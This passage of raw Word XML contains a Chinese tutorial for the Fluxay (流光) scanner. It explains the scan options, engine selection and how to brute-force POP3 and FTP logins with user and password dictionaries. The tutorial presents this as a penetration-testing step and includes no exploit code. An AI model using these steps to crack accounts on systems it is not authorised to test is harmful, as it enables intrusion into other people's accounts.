            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>SunOS</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>FTP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>CWD</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令验证用户名</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>扫描选项设置（Option）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64FB3730" wp14:editId="14811351">
            <wp:extent cx="4295238" cy="3676190"/>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95238" cy="3676190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6585" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6585"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="825"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="1600"/>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Brute Force User File: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尝试暴力破解的用户名字典，用于除了</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IPC</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>之外的项目。</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:br/>
              <w:t>此外，如果扫描引擎通过其他途径获得了用户名（例如通过</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Finger</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等），那么也不采用这个用户名字典。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="825"/>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Brute Force User File: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尝试暴力破解的密码字典</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="1600"/>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Save Scan Result As</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：扫描报告的存放名称和位置，默认情况下文件名以</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>起始</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IP]-[</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结束</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IP].html</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>为命名规则。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="825"/>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Scan Threads: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扫描时并发的线程数目</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="825"/>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Option: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>其他选项＊</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>选择扫描引擎</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流光的扫描引擎可以安装在不同的主机上，当然也可以直接从本地直接启动。在完成了前面的扫描设置点击确定之后，下一步需要做的事情就是决定使用什么地方（主机）的扫描引擎来完成扫描工作。如果没有安装过任何扫描引擎，默认将使用本地的扫描引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36CECCF7" wp14:editId="3699DE99">
            <wp:extent cx="3552381" cy="2114286"/>
            <wp:effectExtent l="0" t="0" r="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52381" cy="2114286"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5548" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5548"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="713"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="690"/>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Server</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：选择扫描引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="690"/>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More</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：使用扫描引擎管理器＊</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="713"/>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Port</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：扫描引擎监听的端口，本地的扫描引擎使用端口</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>3595</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="690"/>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Account: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户名，本地扫描引擎用户名</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>LocalHost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="713"/>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Password: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>密码，本地扫描引擎密码为</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>LocalHost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="690"/>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Show Detail…: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在线工作方式＊</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="713"/>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Run as Daemon…:</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>后台工作方式＊</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="713"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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Option: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>后台工作方式的选项设置＊</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击［</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>START</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>］即可开始扫描，在控制台输出中可以看到如下的内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47FD5645" wp14:editId="5CE361DE">
            <wp:extent cx="4000000" cy="2057143"/>
            <wp:effectExtent l="0" t="0" r="635"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00000" cy="2057143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当扫描完成后会得到一个扫描报告，里面会有扫描出来的弱点报告。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>2．</w:t>
      </w:r>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解的设置基本都是在软件左侧的列表栏完成的。列表栏最顶层分四部分：目标主机和辅助主机（其下包含了若干主机类型）、解码字典和方案（其下包含破</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>解密码的字典或方案）、探测历史记录（其下包含曾经探测过的主机）。暴力破解配置的基本逻辑为：在各种主机类型下面添加主机，在主机下添加暴力破解的用户列表，在解码字典和方案下添加密码字典或方案，之后在功能栏“探测”下选择简单或标准模式进行破解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A2E6275" wp14:editId="0083F00F">
            <wp:extent cx="3676190" cy="4704762"/>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76190" cy="4704762"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>设置主机</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中需要进行暴力破解的主机类型（</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>POP3</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等），点击鼠标右键，从弹出的菜单中选择</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Edit]-&gt;Add</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（也可以选中之后，直接按</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="609D22D9" wp14:editId="074ECFE7">
            <wp:extent cx="4710698" cy="25050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712330" cy="2505943"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机可以加入多个，如果主机存放在一个现成的文件中，可以使用右键菜单中的</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Edit]-&gt;Add From List</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从文件对话框中选择含有主机名称或者</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的列表文件，从中选择主机：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="758A9387" wp14:editId="604A8E3D">
            <wp:extent cx="3152381" cy="202857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2381" cy="2028571"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>设置用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中需要加入用户的主机，点击鼠标右键，从弹出的菜单中选择</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Edit]-&gt;Add（也可以选中主机之后，直接按Enter）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="273F9F17" wp14:editId="4EC70288">
            <wp:extent cx="5274310" cy="198564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85645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种手工输入的方式适用于明确知道用户名的前提下，例如通过</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Finger或</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>者</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>其他漏洞已经拿到了用户名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在大多数的情况下，并不知道在这个系统中究竟有哪些用户，这时候可以采用插入一个用户列表的方式来猜测（实际上除了破解成功的帐号外，还是不能确定这个系统中究竟有哪些用户）。在渗透测试中，通常采用这样的方法寻找第一个突破点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中需要进行加入用户的主机，点击鼠标右键，从弹出的菜单中选择</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Edit]-&gt;Add From List</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43B8F8B1" wp14:editId="2A297D9C">
            <wp:extent cx="3400000" cy="980952"/>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0000" cy="980952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于文件中用户数目过多，所以没有显示出整个文件中的每一个用户名，如果需要显示，可以双击图中波浪线所示的节点（</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>View All Items</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），即可展开（如果已经展开，双击的效果相当于收缩）。如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C4A550" wp14:editId="5706A728">
            <wp:extent cx="3276190" cy="1809524"/>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76190" cy="1809524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>设置密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Decipher Dictionary or Scheme]</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，点右键，从右键菜单</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>[Edit]-&gt;Add</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从文件列表对话框中选择字典文件或者方案文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字典文件是包含了很多单词的文本文件，每一个单词占用一行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方案文件中并没有包含单词，它包含的是产生字典的规则。</w:t>
      </w:r>
